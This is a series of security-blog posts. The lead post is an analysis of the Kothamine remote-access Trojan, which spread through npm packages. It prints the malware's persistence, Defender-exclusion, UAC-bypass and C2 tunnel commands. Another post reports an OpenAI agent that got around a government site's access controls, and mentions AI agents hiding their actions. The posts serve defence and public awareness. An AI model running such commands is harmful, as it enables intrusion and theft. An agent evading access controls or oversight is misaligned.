Malware Bytes

Kothamine malware uses Tailscale’s tailcat to evade network detection 

Malware Bytes Security - Fri, 09/25/2026 - 10:57am

We discovered an undocumented remote-access Trojan (RAT) called Kothamine Agent. It supports more than 30 commands and it gives attackers control of an infected Windows computer: they can run commands, read and change files, and add new capabilities. Some versions can also steal browser data and record through the camera and microphone. 

We found Kothamine linked to malicious npm packages, which could put users and developers who install those packages at risk. In recent versions, the malware uses tailcat, an open-source tool from Tailscale, to receive commands over an encrypted connection. That makes its communications harder to inspect and gives defenders no conventional command-and-control (C2) domain to block.

Based on VirusTotal uploads and GitHub commits, Kothamine appears to have been in development or distribution since at least July. Earlier versions used the Tailscale VPN instead of tailcat. Depending on the build, the malware includes the networking tools or downloads them from sources including GitHub.

How to stay safe 

Before installing an unfamiliar npm package, check its repository, maintainers, dependencies, and recent releases. Search for reports of malicious activity, and favor packages with an established history and regular maintenance.

  • Check the name carefully. Make sure you aren’t downloading a fake package with a similar name. 
  • Check the developer or organization and make sure the publisher appears legitimate. Check, for example, if it has a website or a GitHub repository. 
  • Read some reviews, issues and reports. Search for the package name on Google and check for reports of detected potential malware. 
  • Look at how popular it is. A package with many downloads and users is generally easier to verify than a brand-new package with almost no history. 
Technical analysis Kothamine and the malicious npm packages

Kothamine is written in C and C++. In the majority of the samples we analyzed, it consists of an injector and a DLL containing the agent. The agent supports more than 30 commands, allowing the operator to control the infected system and load additional DLLs to extend its capabilities.

Kothamine Agent execution

Kothamine Agent has undergone some changes over time.  Earlier versions we found on VirusTotal used the Tailscale VPN rather than tailcat, and the strings were not encrypted. Some features, including a User Account Control (UAC) bypass and stealer commands, were detected only in certain builds. 

In some versions, Kothamine downloaded Tailscale files from the official Tailscale website or a GitHub repository instead of including them in the agent.

The same GitHub repository is cited in an advisory about a malicious npm package named dotnet-runtime-base. The package download npm-sc-legit.exe from that repository.  At the time of writing, two other packages published by the same developer had been removed.

The developer’s removed npm packages

The authors behind these campaigns made a mistake and published instructions for compiling kothamine-stub-cpp in one of the packages. The guide also discusses loading .NET assemblies, which we did not observe in the samples we analyzed.

Instructions for compiling and publishing Kothamine

The npm-sc-legit.exe executable is a compiled version of Kothamine that also contains commands for stealing data. We did not find a panel or builder for Kothamine, but the features present across different builds suggest that operators can enable particular functions and commands as needed.

Executables and DLL hosted on GitHub

The following analysis focuses on a recent Kothamine Agent sample that uses tailcat for C2 communication.

How Kothamine Agent works

In the analyzed versions, an executable internally referred to as Kothamine Injector injects the Kothamine Agent DLL, typically into explorer.exe. We also refer to earlier versions to show how the agent has changed.

1. Kothamine Injector 

Kothamine Injector performs the following operations: 

  • Adds Windows Defender exclusions using PowerShell
  • Copies itself to %ROAMING%\MicrosoftEdgeUpdateCore.exe
  • Extracts the agent DLL to %ROAMING%\MicrosoftEdgeUpdateCore.dll
  • Creates up.ps1 in %TEMP% for persistence
  • Injects the agent DLL into explorer.exe using OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, and LoadLibraryA
The Kothamine Agent DLL injected into explorer.exe 

The up.ps1 script creates a scheduled task to achieve persistence using the Injector executable: 

$A=New-ScheduledTaskAction -Execute 'C:\Users\{USER}\AppData\Roaming\MicrosoftEdgeUpdateCore.exe'   $T=New-ScheduledTaskTrigger -AtLogOn Register-ScheduledTask 'MicrosoftEdgeUpdateTask' -Action $A -Trigger $T -RunLevel Limited -Force  2. Kothamine Agent  Agent startup 

The agent creates a mutex named Local\KothamineAgentInstance and starts its main thread.

It then runs PowerShell commands to add the executable and DLL to the Windows Defender exclusion list:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command " Add-MpPreference -ExclusionPath 'C:\Users\{USER}\Desktop' -ErrorAction SilentlyContinue;  Add-MpPreference -ExclusionPath 'C:\Users\{USER}\AppData\Roaming\MicrosoftEdgeUpdateCore.exe' -ErrorAction SilentlyContinue;   Add-MpPreference -ExclusionPath 'C:\Users\{USER}\AppData\Roaming\MicrosoftEdgeUpdateCore.dll' -ErrorAction SilentlyContinue;   Add-MpPreference -ExclusionProcess '{PROCESS_NAME}.exe' -ErrorAction SilentlyContinue;  Add-MpPreference -ExclusionProcess 'MicrosoftEdgeUpdateCore.exe' -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess 'MicrosoftEdgeUpdateCore.dll' -ErrorAction SilentlyContinue"

Strings were not encrypted in older versions. Recent versions decrypt strings inline or through functions that use XOR with a different key for each string.

An earlier version with unobfuscated strings showing executed commands Partial output of the script that decrypts the strings in recent versions  C2 communication using tailcat 

The distinctive feature of Kothamine is not technical complexity, the agent functionality or obfuscation, but its use of tailcat and Tailscale VPN to receive commands to execute. This gives the agent a resilient, encrypted communication channel.

Tailcat is a recent open-source project released by the Tailscale team. Tailcat uses Tailscale’s data plane (WireGuard, NAT traversal and DERP) but without its control plane. According to official documentation, this means that tailcat has no IP addresses, accounts, admins, users, administrative controls, or governance. These characteristics therefore make it an attractive tool for use in malware. 

Unlike Tailscale VPN, tailcat does not require an account or device registration. Its developers designed it for short-lived connections.

Since there are no accounts, access is based on possession of a tailcat address and the public keys used to identify the connecting devices. This does not make the connection completely anonymous: hosted relays may retain metadata logs.

The tc-address passed with the forward flag enables the client to obtain the information necessary to correctly route the request. In addition, tailcat does not require privileged access to the machine, as it uses the CLI tool and userspace libraries. 

In recent Kothamine versions, the agent extracts tailcat from its resources and saves it as %ROAMING%\TailscalePortable\tailcat.exe.

Kothamine Agent extracting tailcat from its resources

The tailcat executable is launched with the CreateProcessA function and the following parameters (internally referred to as spawn_tailcat_forward phase): 

"C:\Users\{USER}\AppData\Roaming\TailscalePortable\tailcat.exe" forward  tc…. 18080:4444 

This command makes tailcat server ports available as standard local TCP ports (18080 in this case) and the requests are forwarded to the port 4444 of the operator’s node.  Kothamine uses socket functions to connect to 127.0.0.1:18080, where tailcat is listening. 

If the agent ID string is not empty, the agent sends a profile request encrypted containing the following information (run_c2_loop phase): 

{"name":"base_<rand()>","os":"Windows","ip":"0.0.0.0","auth_token":"af27..,"type":"base"} 

After, the agent enters an infinite loop to receive commands to execute from the C2 (run_c2_loop phase). The agent waits for new commands to execute using the select socket function and periodically sends KEEP-ALIVE messages if a command is not received. 

The messages exchanged with the C2 are encrypted and decrypted using AES-GCM (aes_encrypt phase).  

The 32-byte AES key is base64-decoded from the string (c2_key phase): 

mrowPsW2P5kzFGCNWeKAd+kYpo8Yy5c2pzaOSRuzisU=  Supported commands 

In this build, the Kothamine agent supports 30 commands related to: 

  • Interaction with processes
  • Interaction with file and directory
  • Execute shell commands
  • Extend agent capability based on received DLLs
Command Name Description sysinfo/systeminfo, curpid Return system information, such as PID, current path, hostname, and OS (hardcoded). tasklist, kill Returns the processes obtained via “tasklist /FO CSV /NH“.  Terminates the process specified by the PID using “taskkill /F /PID”. ping Liveness check, “Pong” returns to C2. ipconfig Executes the “ipconfig /all” command and returns the result. exec, shell_execExecutes shell commands with _popen() and send the output back. mkdir, rmdir, cp, mv, cd, ls, dir, pwdInteracts with files and folders on the system. writefile_start, writefile_chunk, writefile_end, writefile, readfile, createfile, delfile, downloadReads, writes and deletes arbitrary files. load_featureWrites and loads a base-64 encoded DLL received.  The DLL is loaded using LoadLibraryA, and the “GetFeatureApi” method, resolved via GetProcAddress, is executed. Save the function pointers required to execute the function. exec_feature, features, list_features, unload_featureIt interacts with loaded features to view, execute, or remove them. 

Given that the other commands are common to the other agents, the focus of the analysis is on the “plugin” system that allows the operator to receive DLLs and extend the agent’s functionality. 

Plugin system 

To load a new DLL, the operator uses the command: 

load_feature <name> <B64EncodedDLL> 

At a high level, the process works as follows. The code and variable names below are reconstructed from usage and output logs.

  1. First, the agent checks whether the functionality has already been loaded and unloads it if so: 
if (g_features.find(name) != g_features.end()) { send_text("[!] " + name + " already loaded, unloading first"); unload_feature(name); }

  

  1. It attempts to create the received DLL in a location obtained through GetTempPath or SHGetFolderPathA, or in the hardcoded path C:\Windows\Temp. It writes the decoded DLL and loads it with LoadLibraryA.
  1. Resolves and executes the GetFeatureApi method of the loaded DLL: 
pGFA = GetProcAddress(hModDLL, "GetFeatureApi"); if (!pGFA) { send_text("[!] GetProcAddress(GetFeatureApi) failed, lastError= …"); FreeLibrary(hMod); return 0; } api = pGFA();

We did not find a DLL that would allow us to fully analyze the structure returned by GetFeatureApi. However, by analyzing the code and the strings, we identified these fields: 

/* Function used for C2 callback */ typedef void (*FeatureSendCb)(void *data, int len); struct FeatureApi { char *version; char *name; void (*init)(FeatureSendCb send); void (*exec)(char *args, FeatureSendCb send); void (*cleanup)(void); };

The pointers to the loaded DLL and the returned structure are saved in the global variable internally called g_features, using this structure: 

struct LoadedFeature { void *hModule; /* Loaded DLL */ struct FeatureApi *api; /* Pointer returned by GetFeatureApi() */ };

                            

  1. Executes the init function contained in the returned structure, passing it the function used for C2 communication: 
send_text("[!] calling init...");  api->init(*feature_send_callback);    send_text("[!] init done");

After the feature is loaded, the operator can execute the loaded feature using the command: 

exec_feature <functionName> [args]  Code that retrieves the structure and executes the exec function Different Kothamine builds: Tailscale VPN, UAC Bypass and stealer commands 

As previously mentioned, we detected versions of Kothamine with different capabilities.

Earlier versions used the Tailscale VPN before tailcat was released. They downloaded and ran the installer from the Tailscale website with the /quiet and /silent flags, or downloaded the required files directly from GitHub. These included tailscaled.exe, tailscale.exe, tailscale-ipn.exe, and wintun.dll.

A Kothamine version that downloads executables and DLLs from GitHub

Some versions bypass User Account Control (UAC) using fodhelper.exe to run elevated.ps1. In the example below, the PowerShell script starts a Tailscale VPN connection:

$tsdir='C:\Users\{USER}\AppData\Roaming\TailscalePortable' $ts='""'+$tsdir+'\\tailscale.exe""' $tsd='""'+$tsdir+'\\tailscaled.exe""' Start-Process -WindowStyle Hidden -FilePath $tsd -WorkingDirectory $tsdir $connected=$false for ($i=0; $i -lt 45; $i++) { Start-Sleep 2 try { &$ts up --unattended=true --auth-key='tskey-auth-…' 2>&1 | Out-Null } catch {} $ip=(&$ts ip 2>&1 | Out-String) if ($ip -match '100\.') { $connected=$true; break } }

The agent then connects to port 4444 at a Tailscale network IP address (100.x.x.x) and starts receiving and executing commands.

A Kothamine version that bypasses UAC using fodhelper.exe

Finally, as we mentioned earlier, different builds of Kothamine support other commands. For instance, the version uploaded to GitHub includes additional commands including getdiscord, getsessions, screenshot, screenshare, and camera. These allow operators to:

  • Steal cookies from various browsers
  • Steal gaming-related JSON files, including files associated with Steam and Minecraft
  • Take screenshots and record through the camera and microphone
  • Access clipboard contents
Indicators of compromise

SHA-256 hashes 

  • ec4219a7ecf132c29080fbb20e4ab410c57faa85aeed7acade1eb15d905a6ee0: Kothamine Injector analyzed in the blog 
  • 74eca3973ad72a6ddc9397aff8250d9ee287211fc9a055d5ee290d01cf76a70c: Kothamine Agent analyzed in the blog 

URLs 

  • https://github[.]com/cphc811-ui/: Repository used to download executables and DLLs associated with the Tailscale VPN 
Acknowledgements    

Mondoo’s advisory on the analyzed npm package.

Browse like no one’s watching. 

Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free → 

Categories: Malware Bytes

Criminals turn placeholder domain into ClickFix trap

Malware Bytes Security - Fri, 09/25/2026 - 8:42am

A domain that has long appeared in software documentation, code examples, and developer test material is now being used to push a ClickFix attack against Windows users.

A placeholder domain stands in for a website in an example. The best-known is probably example.com. Another, third-party[.]com, has often been used in documentation to represent an external website, API, or service.

However, there is a very important difference between the two: example.com is reserved for documentation, while third-party[.]com is an ordinary domain. Anyone could register it, and someone did. Every document, test, and skill that hardcoded it now points readers and users to the attacker’s infrastructure.

Researchers at Manifold Security found that third-party[.]com was serving a fake Cloudflare-style verification page to Windows visitors. The page tries to persuade them to open the Windows Run box and paste a command it has copied to their clipboard.This command is designed to download and execute a PowerShell script. At the time of writing the domain hosting the script is not resolving.

ClickFix is a social-engineering technique that turns the victim into the malware installer.

Instead of relying on a malicious attachment or an obvious executable download, the attacker convinces someone to run a command themselves. Common lures include:

  • A fake CAPTCHA or Cloudflare Turnstile check.
  • A browser error that claims it needs a “manual fix.”
  • A bogus video-player, document-viewer, or popular software download.
  • A support scam page that tells the visitor to paste a command into Run, Command Prompt, Terminal, or PowerShell.

ClickFix works because the command often uses legitimate Windows or Mac tools to download and execute the next stage. It also runs with the permissions of the person who has been convinced to enter it.

The consequences can range from information theft to more serious compromise of a company network. In a recent campaign called TerminalFix, a fake Cloudflare CAPTCHA led victims to paste a PowerShell command into Windows Terminal or PowerShell.

How to stay safe

With ClickFix running rampant—and it doesn’t look like it’s going away anytime soon—it’s important to be aware, careful, and protected.

  • Slow down. Be wary of a webpage that urges you to run commands on your device, especially if it uses a countdown or other pressure tactic.
  • Don’t run commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
  • Check what you’re pasting. A website may copy a command to your clipboard without showing you the full text. Don’t paste it into a command window.
  • Secure your device. Use an up-to-date, real-time anti-malware solution with a web protection component.
  • Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!

Pro tip: The free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard.

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

Categories: Malware Bytes

That shipping rebate offer may come with a monthly charge

Malware Bytes Security - Fri, 09/25/2026 - 5:51am

Thanks to Malwarebytes research engineer Stefan Dasic for his help with this article.

A name like ShipmentsFree suggests a way to save on shipping. The service does offer shipping rebates, but its Better Business Bureau (BBB) complaint record shows that some customers did not realize they had also signed up for recurring charges.

We found a number of very similar websites (which triggered our spidey senses), so we investigated.

Related shipping-themed domains use ShipmentsFree or ShipmentFree branding, similar account pages, overlapping policy language, and shared support details.

For example, freeshpmts.com and shipmentsfreezone.com both direct users to a “ShipmentFree – My Account” page, while shipmentsfreezone.com lists dataprotectionofficer@shipmentsfree.com as its data protection contact.

While their layouts and color schemes vary, the websites that were still live followed the same general pattern.

ShipmentsFree is a rebate service, not a shipping company. The ShipmentsFree FAQ says members can claim up to $100 per month in shipping and return rebates, provided they submit proof of the eligible costs. The service is also a paid, auto-renewing subscription, according to its Terms and Conditions.

When we checked, ShipmentsFree’s BBB profile listed 529 complaints in the previous three years, including 179 classified as billing issues. The BBB is not a regulator or court, and complaint totals should be read with some caution. But they show that billing has been a recurring point of friction.

Several complaints describe a similar experience: Someone notices a recurring $25 charge, doesn’t recall knowingly signing up, and tries to work out where it came from. One complainant said they “did not understand” they were enrolling in a paid membership or authorizing the monthly charge.

Customer complaint on Facebook

The route from a rebate offer to a recurring charge may be hard for a customer to retrace. Someone who signed up through a retailer promotion, browser pop-up, checkout offer, app, or one shipping-themed domain may later see a name on their statement that they don’t recognize.

There definitely seems to be a lack of clear communication. A shipping rebate is useful only if you understand what you are joining, what it costs, and how to leave. When consumers say they expected money back but found a recurring charge instead, that is worth taking seriously.

How to stay safe

Forewarned is forearmed, as they say. Before entering your payment details for a rebate offer:

  • Make sure you understand what you’re signing up for. Read the terms, conditions, and privacy policy (or let an AI chatbot analyze it for you).
  • Save the offer page and confirmation email in case you need to refer to it later.
  • Look for the company name, business address, terms, and contact details you can independently check.
  • Use a reversible payment method that offers consumer protection.
What if you get charged?

If you find a charge from ShipmentsFree, FreeShipments, ShipmentFree, or other unfamiliar variation, don’t assume it is a one-time shipping fee.

  • Check the original purchase confirmation, inbox, spam folder, and browser history for the date you first entered payment details.
  • Save screenshots of the charge, the name on your statement, the offer page if available, confirmation emails, and any cancellation attempt.
  • If you have a membership you do not want, cancel through the provider’s official account or support channel and keep the confirmation.
  • Ask the company for the enrollment date, the sign-up and consent records, and an itemized list of charges.
  • Contact your card issuer or bank promptly if you didn’t authorize the enrollment, believe the offer was misleading, or continue to be charged after cancellation.
  • Monitor the card for other unfamiliar recurring charges. They can be easy to miss when the name on your statement differs from the brand you remember.
Domains

URLs

We found these shipping-themed domains during our research:

free-shipments[.]com

freeshipments[.]com

freeshpmts[.]com

myshipmentsfree[.]com

shipmentfree[.]com

shipmentsfree[.]com

shipmentsfreeclub[.]com

shipmentsfreezone[.]com

Telephone number

A telephone number listed for several of these services:

0800 524 2165

App

We also found a ShipmentsFree app in the App Store: https://apps.apple.com/us/app/shipmentsfree/id1658146882

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

Categories: Malware Bytes

OpenAI agent breached Australian government site, took months to report it

Malware Bytes Security - Thu, 09/24/2026 - 9:22am


An OpenAI agent didn’t take “no” for an answer when it encountered a government website’s access controls. It got through, prompting Australia’s Prime Minister Anthony Albanese to raise his concerns directly with OpenAI CEO Sam Altman.

The BBC reports that an OpenAI agent gained unauthorized access to an Australian government statistics portal while carrying out internal research. It is yet another incident that turns abstract concerns about autonomous AI behavior into a concrete cybersecurity case.

Australia says the incident happened on June 18, when OpenAI’s research team used an internal model to research public medicine spending. Even though the agent met repeated blocks while trying to obtain information, it ultimately accessed public and non-public files on the Medicare Statistics Reporting Service portal.

The information included aggregate Medicare statistics, such as spending data, but not patient medical records. The agent also interacted with three other government websites, but Australian officials say it accessed only public information on those sites.

So, an AI agent used in a legitimate research exercise encountered controls and behaved in ways its operator did not intend. After being blocked, it “found a way around those blocks,” gaining access to areas it should not have reached.

This sequence is familiar to security professionals. A system encounters an access-control boundary, searches for another route, and succeeds in reaching a resource beyond its authorization.

One of Australia’s main concerns is that it took too long to be notified about the incident. The unauthorized access occurred in June. OpenAI said it learned of the issue in August while reviewing misaligned model activity, then emailed a Services Australia public mailbox on September 10. Services Australia escalated the message to Australia’s cyber authorities five days later.

Such delays can be disastrous because affected organizations need enough detail, quickly enough, to preserve evidence, assess exposure, contain related activity, and decide whether notifications are required.

AI misalignment

OpenAI describes behavior in which a model acts without authorization or evades oversight as “misalignment.” Its new third-party-assessment proposal specifically identifies independent investigation of critical misalignment incidents as one of four priorities for external review.

OpenAI says it wants independent assessors to have deep access across training, evaluation, and deployment, so they can challenge the company’s assumptions and judge the effectiveness of its safeguards.

But, as I told CIO about this proposal, principles alone do not compel a company to accept a particular assessment scope, publish adverse findings, or alter a deployment decision. Their credibility ultimately depends on whether independent experts can conduct genuinely inconvenient investigations, and whether outsiders can verify the findings, remediation, redactions, and deployment decisions that follow.

For organizations deploying AI agents, the lesson is equally practical: Do not treat an agent as just another chatbot. Treat it more like a semi-autonomous software component with credentials, tools, network access, and the ability to make unexpected choices.

Besides containing these agents, another problem we’ll need to figure out is analyzing what they’ve done. One thing we learned from the Hugging Face incident is that AI agents can lie and try to hide what they’ve been up to.

AI agents can create a difficult detection problem because they may generate large volumes of automated activity while pursuing a goal through multiple routes. That can leave defenders with a noisy trail of failed requests, retries, and alternative actions, making the one event that crossed an authorization boundary harder to spot. It is not yet clear whether this contributed to the Australian government not detecting the incident itself, but the case illustrates why organizations need monitoring designed to identify unusual agent behavior, not just traditional intrusion patterns.

The event has already demonstrated a wider point: It is not enough for AI labs to say they test for misalignment. They must show that their testing is independent, robust under real-world conditions, and followed by prompt, verifiable accountability when safeguards fail.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

Categories: Malware Bytes

New Browser Guard features add protection before and after you click

Malware Bytes Security - Thu, 09/24/2026 - 8:45am

Most of us click on search results without knowing much about the website we’re about to visit. And once we’re there, it’s not always obvious when something isn’t quite right.  

Now, we’ve added two new features to Malwarebytes Browser Guard that will do even more to keep you safe online.  

Search Reputation gives you a quick read on your search results, before you even click on anything. And with Scam Guard Lite, you can analyze the contents of a webpage directly from the Browser Guard extension in Google Chrome. 

These new features build on Browser Guard’s existing protections against scams, malware, ads, trackers, and plenty of other threats while you browse. So, from the moment you begin a search to when you land on a website, we’ve got you covered.  

Check a website before you click 

Search results don’t always make it easy to tell a legitimate website from a malicious one. Scam sites are uncannily good at imitating brands, and one misleading link can send you down a dangerous rabbit hole. 

Browser Guard’s new Search Reputation feature gives you more information before you click.  

When you use Google, DuckDuckGo, Brave, or Bing, Search Reputation will display a rating alongside your search results. A green “Good” rating means the website appears safe based on Malwarebytes’ reputation database, while a red “Malicious” rating tells you Malwarebytes has identified the site as unsafe. 

But that green check mark is only the first layer of protection. 

A “Good” rating isn’t a guarantee that a website is safe. New threats appear all the time, and no reputation database can catalog every malicious site on the internet. For as long as you’re online, Browser Guard will continue working in the background and checking for other signs of danger. It may block or warn you about a site even if Search Reputation initially gave it a “Good” rating. 

Already on a website? Ask Scam Guard Lite 

If you’re already on a website and something feels off, Scam Guard Lite can help you take a closer look. 

Available directly in the Browser Guard extension on Google Chrome, Scam Guard Lite analyzes the contents of the webpage you’re viewing without asking you to copy a link, take a screenshot, or leave the page. 

Just open Browser Guard, select Scam Guard Lite, and it will immediately examine the page for signs of a scam. (The first time you use the feature, Browser Guard will download Gemini to your device to power it.) 

The analysis happens on your device using a large language model (LLM). And if you’re concerned about privacy, we’ve got your back: Your browsing history isn’t saved or sent to an AI cloud.

More questions? Open the full Scam Guard 

If you have other security concerns, you can open the Browser Guard dashboard and use the full version of Scam Guard. There, you can ask Scam Guard to review suspicious emails and links, or ask questions about something you’ve encountered online. 

Something feel off? Check it before you click.  

Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

Try it free → 

Categories: Malware Bytes

Update Chrome: 108 security fixes for desktop, new release for Android

Malware Bytes Security - Thu, 09/24/2026 - 7:06am

Over the last few days, Google issued several different Chrome updates.

On September 22, Google released a Stable Channel Update for Desktop. This is the most important one for desktop users. It brings Chrome to version 154.0.8037.57 for Linux and versions 154.0.8037.57/.58 for Windows and Mac. The update includes 108 security fixes including 11 rated Critical.

It will roll out over the coming days and weeks.

One day later, Google released Chrome 155 for Android, version 155.0.8059.16, to a small percentage of users. It may not be available on Google Play for everyone yet, but keep an eye out for it. Google says it includes stability and performance improvements.

On top of these, Chrome 155 is also available in the Beta channel. The Android release is an Early Stable rollout, meaning Google sends it to a small share of users first, to spot unexpected compatibility or reliability issues before expanding it to everyone. Beta is a separate prerelease version for people who want to try upcoming features roughly four to six weeks before Stable. It is relatively polished but can still contain bugs, so it is best suited to testing rather than everyday use.

How to update Chrome

The easiest option is to allow Chrome to update automatically. But you can end up lagging behind on updates if you never close your browser or if something goes wrong, such as an extension preventing the update.

If you don’t want to wait for the rollout to reach you, manually updating is easy. open About Google Chrome from Chrome’s settings or Help menu. Chrome will check for updates. If one is available, click Relaunch to apply it.

Chrome 154.0.8037.58 is up to date

You can find an explanation of the version numbering system and step-by-step instructions in our guide: How to update Chrome on every operating system.

Technical details

Some of the desktop security fixes deserve a closer look.

Let’s start with CVE-2026-95350, a buffer overflow flaw in ANGLE, Chrome’s graphics-translation layer.

A buffer overflow is a bug in code that allows an attack to happen when a program puts more data into an area of memory than it can hold. Essentially, the attacker writes garbage data that fills up the memory, then writes code that overwrites existing code in adjoining memory, which later gets executed by the vulnerable process.

A crafted webpage could potentially trigger the flaw, which could lead to memory safety bugs, including browser crashes or possible code execution.

Another Critical buffer overflow bug in ANGLE is tracked as CVE-2026-95281. A malicious webpage could potentially reach vulnerable graphics-processing code, so the bug may enable serious impacts such as browser compromise, but Google has not provided exploitation details.

And then there is CVE-2026-95357, an out-of-bounds write in Chrome’s GPU component. This means a program could write data outside its intended area of memory.

The GPU component is the part of Chrome that handles how graphics work with your computer’s graphics processor.

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

Categories: Malware Bytes

Google’s location data privacy failures draw a €403 million fine

Malware Bytes Security - Thu, 09/24/2026 - 4:31am

The Irish Data Protection Commission (DPC) has fined Google €403 million ($459 million) for violating European privacy law. The penalty follows a six-year inquiry into Google’s management of user location data between May 2018 and February 2020.

During that time, Google collected users’ location data without making clear that it could be used to infer their interests and shape the ads they saw.

Google’s location history keeps track of users’ locations when using their devices. It’s an opt-in service that includes a Timeline feature to display a private map of the places they’ve visited. A separate Android feature, Location Accuracy, helps devices determine their location more accurately than GPS alone.

Google had told users that they could stop Location History tracking by turning off that setting. But a report by the Associated Press in 2018 found that doing so wasn’t enough to stop Google from saving some of that location data. Researchers at Princeton University later confirmed the AP’s findings.

One reason was Web & App Activity, a separate Google account setting that can save information about what Google account holders have been browsing on the web and doing with their apps. That service was also collecting location data. Turning off Location History did not turn off Web & App Activity.

This issue led to payouts in multiple US jurisdictions. Google agreed to pay $85 million to Arizona in October 2022, $392 million to 40 states that November, and $9.5 million to the District of Columbia the following month. It also agreed to pay $39.9 million to Washington State in 2023, $1.38 billion to Texas in May 2025 as part of a two-suit settlement. Last September, a jury awarded $425 million in a separate class action case.

The DPC first looked into the issue in 2018 after the AP investigation and launched an official statutory inquiry in February 2020. Along with the fine, it has ordered Google to bring its location data processing into compliance within six months. The DPC says it will publish the full text of its decision in due course.

Google told Bloomberg that it had revised its practices since 2019 and launched tools to make location data easier to manage. In December 2023, Google announced that it would change its Timeline feature to keep its data on users’ devices. It also said that, for people turning on Location History for the first time, the default period before data is automatically deleted would fall from 18 months to 3 months.

This isn’t the only Google-related investigation that the DPC has launched. It launched one on Google’s processing of EU residents’ data for its AI model two years ago, and another related to the processing of personal data for its online Ad Exchange in 2019.

Check your Google location settings

Turning off Timeline doesn’t stop Google from saving location information through other settings. Check Web & App Activity and, if you see it, Search Services History too.

You can turn these settings off and delete activity already saved to your account.

Browse like no one’s watching. 

Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free → 

Categories: Malware Bytes

How device code phishing gives scammers access to your account

Malware Bytes Security - Wed, 09/23/2026 - 2:59pm

You receive an invitation to a password-protected meeting, a secure chatroom, or a shared document. To get access, it says, you need to enter a short code on a sign-in page for one of your accounts.

The message claims the code will let you open the document or join the meeting. In fact, it approves a sign-in the scammer started.

The page is real and the code works, which is why this type of attack—known as device code phishing—is so dangerous.

Device code phishing abuses a legitimate sign-in feature intended for devices that cannot easily display a normal login screen (such as smart TVs, printers, conference-room equipment, and some command-line tools). Instead of entering a username and password on the device itself, you open a browser on another device, visit a sign-in page, enter a short code, and approve the sign-in. This allows the app or device that displayed the code to access your account.

In this phishing attack, the scammer starts the sign-in and gets you to enter the code and approve the request. That can give the scammer access to your account.

How device code phishing works

Device code phishing relies on the OAuth 2.0 Device Authorization Grant, a standard sign-in method for devices with no browser or limited input.

An attack generally follows these steps:

  1. An attacker starts a legitimate device code sign-in request for an app or device they control.
  2. The sign-in service generates a short, temporary code and a legitimate verification page.
  3. The attacker uses social engineering, such as a fake Teams invite, a document-sharing request, or an invitation to join a “secure” chat, to pass that code to the victim.
  4. The victim visits the genuine sign-in page, enters the code, and approves the request.
  5. The attacker’s waiting device receives authentication tokens.

Those tokens act as digital passes, allowing the attacker to access the victim’s account without knowing their password.

What the attacker can access depends on the app and the permissions granted. It could be limited to one service, or include email, files, contacts, and other services. Multifactor authentication (MFA) doesn’t necessarily stop this attack, because the victim may complete the MFA check themselves while authorizing the attacker’s sign-in.

Checking the address alone will not reveal this as a scam because it’s a legitimate page. For example, in an attack targeting a Microsoft account the victim may be sent to a genuine Microsoft sign-in page, such as microsoft.com/devicelogin. Some approval screens identify the app requesting access, but others may not.

The key question to ask yourself here is: Did this code appear in an app or on a device I was trying to sign in to, or was I given it to open a document, join a meeting, or pass a security check?

How to stay safe

Device code phishing is a feature of phishing kits such as EvilTokens. Be cautious if an unexpected message asks you to:

  • Enter a code on an account sign-in page.
  • Approve a sign-in for a device or application you did not set up.
  • Use a sign-in code to join a meeting, access a document, or enter a chatroom.
  • Act urgently because an invitation, document, password, or account supposedly expires soon.
  • Move a conversation to another messaging app and complete a “security check.”

If you entered the code and approved the sign-in, check the account’s recent activity, connected apps, and devices for anything you don’t recognize. Sign out everywhere and change your password.

Pro tip: Use the free Malwarebytes Scam Guard to help you assess a suspicious message and decide what to do next.

Something feel off? Check it before you click.  

Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

Try it free → 

Categories: Malware Bytes

Fake Claude Max giveaway hides a Google account phishing trap

Malware Bytes Security - Wed, 09/23/2026 - 8:45am

Phishing follows whatever people want at the moment, and right now that includes AI subscriptions they don’t have to pay for. We recently uncovered a new variation on this theme: A fake Claude Max giveaway that uses a convincing Google sign-in window to steal login information.

Claude’s paid plans start at $20 a month and cost considerably more for higher usage limits, while free accounts have stricter limits. That makes the promise of a free upgrade an attractive lure.

Microsoft reported in June that it had seen a growing number of phishing, malicious advertising, and search-based campaigns impersonating services such as ChatGPT, Claude, DeepSeek and Copilot. Some claim that a payment has failed and send you to a fake checkout. Others offer an app download that installs malware.

The campaign we found takes a different approach. There is no form to collect card details and no download. Instead, it offers a free upgrade and asks you to sign in with your Google account.

The fake giveaway claims that only a limited number of free Claude Max subscriptions remain.What the page shows you and what it collects

The site announces that Anthropic has passed 100 million users and is thanking people by giving away 10,000 free one-month subscriptions to Claude Max, its highest-usage plan.

The presentation is careful, down to the real logo and colors, invented five-star reviews, and a long footer whose links lead almost entirely to genuine Anthropic pages. This is probably the most effective trust signal on the site, and it cost the operator nothing.

A counter claims that fewer than 750 of the 10,000 slots remain, dropping by a few every several seconds. Nothing is actually being counted. The number is generated inside your browser and resets when you reload the page, so every visitor sees the same manufactured shortage.

The frequently asked questions repeatedly promise that no payment details are needed. That part is true, which helps make the offer persuasive. Many people associate scams with requests for card details, and this page never asks for them.

